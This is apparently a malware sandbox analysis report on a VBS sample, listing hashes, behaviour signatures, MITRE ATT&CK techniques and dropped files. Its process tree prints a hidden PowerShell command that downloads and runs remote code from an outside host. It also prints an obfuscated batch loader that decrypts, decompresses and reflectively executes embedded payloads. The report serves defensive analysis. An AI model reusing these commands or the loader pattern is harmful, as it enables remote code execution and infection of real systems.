6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663

General

Target

6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663.vbs
Size

78KB
MD5

f5bfac09b17af66506e500ce22c71f92
SHA1

bf949f2cb7457bcc173e0b98f656be133a088225
SHA256

6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663
SHA512

5cab281eae07d317c02f031986b472967b4ffdca1dc3343d4e697f1ae1d8503ba237e5e1c7b60b55154f29421f7d3c79e1f125b56f96b98bcd58fa1677756d26
SSDEEP

1536:9dKIP+7Eys+3Xe05WVD8/PSfxDrtlsMKePYPm9nPJ6oMM:9dKIP8EyF3rqD8/2xvtBP0InR6NM

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2200	powershell.exe
1920	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2200	powershell.exe
1920	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	1920	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2936 wrote to memory of 2200	2936	WScript.exe	30
PID 2936 wrote to memory of 2200	2936	WScript.exe	30
PID 2936 wrote to memory of 2200	2936	WScript.exe	30
PID 2936 wrote to memory of 900	2936	WScript.exe	33
PID 2936 wrote to memory of 900	2936	WScript.exe	33
PID 2936 wrote to memory of 900	2936	WScript.exe	33
PID 900 wrote to memory of 2240	900	cmd.exe	35
PID 900 wrote to memory of 2240	900	cmd.exe	35
PID 900 wrote to memory of 2240	900	cmd.exe	35
PID 900 wrote to memory of 1920	900	cmd.exe	36
PID 900 wrote to memory of 1920	900	cmd.exe	36
PID 900 wrote to memory of 1920	900	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mvtIQEpeE2igYXIdDEEHrUp8bEsGaEVGh0sp8SAhblA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vT8eb5DW9nWYQVd4hxOXDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GQouJ=New-Object System.IO.MemoryStream(,$param_var); $OJwfz=New-Object System.IO.MemoryStream; $jgIod=New-Object System.IO.Compression.GZipStream($GQouJ, [IO.Compression.CompressionMode]::Decompress); $jgIod.CopyTo($OJwfz); $jgIod.Dispose(); $GQouJ.Dispose(); $OJwfz.Dispose(); $OJwfz.ToArray();}function execute_function($param_var,$param2_var){ $zmCZQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $brFtT=$zmCZQ.EntryPoint; $brFtT.Invoke($null, $param2_var);}$tofzw = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $tofzw;$UpwQA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tofzw).Split([Environment]::NewLine);foreach ($ZFAFd in $UpwQA) { if ($ZFAFd.StartsWith('hSymiLYPJtzQULYISQvX')) { $aTuto=$ZFAFd.Substring(20); break; }}$payloads_var=[string[]]$aTuto.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2240
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
cc49ce3b6a2c61afa08d46410a78514a

SHA1
2a0f7a3890ee4844194715d83aa6bf771250e9d6

SHA256
26f4a4fe560cd59fdcaf064f059865da9b9723b7f8c8480e3e6bd8ccd6b3faf7

SHA512
f785cb451bb0ecfd554e65152652222860803e560ebe06a526c7f17b3bdeda9033a29a0250f97450b37bdf9d34599ccb9e5cb57fd97e46b83140076557b19d0b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
825eaa9ecd6c54d0a42e7bdda7f15f62

SHA1
6550014ae63f9e4e36c5347c96fecf91d892c43f

SHA256
5339218ccd516f8f39e330661d70553b90d81851e8459dd69107e00ecc72b844

SHA512
3bbb885c3e401fbff5cbadc906e376f83bdbe4645ecdad974c97c2c0996b07f7f4e23d794c1fe07ceb73c9c2ef2844bf2b83e547600e0b04b8edc8a57f4c4328

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9KRQ4ACETEBNB3JHWH1F.temp

Filesize
7KB

MD5
eb9b6f70d2c67f8f47ba9fc9757af9e3

SHA1
f87f70f13f0a142edb42a5ffb59f9ad0a57efdf3

SHA256
52dc2d2fe01dafd23a01cf20111ba2dbf52b5e6f1d7c0a08a1e563e8ac26db6a

SHA512
90f8560cc5d4f68a397e7f73dd0a54a28ae785c4b1951e4225979f33a3f06466738a9f1d284c04dbf347bb325055b7bf2fe47abba73a9a53ca9d014f86d99216

Download Submit
memory/1920-27-0x000000001B800000-0x000000001BAE2000-memory.dmp

Filesize
2.9MB

Download
memory/1920-28-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2200-7-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/2200-11-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/2200-10-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/2200-9-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/2200-8-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/2200-4-0x000007FEF5AFE000-0x000007FEF5AFF000-memory.dmp

Filesize
4KB

Download
memory/2200-5-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/2200-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing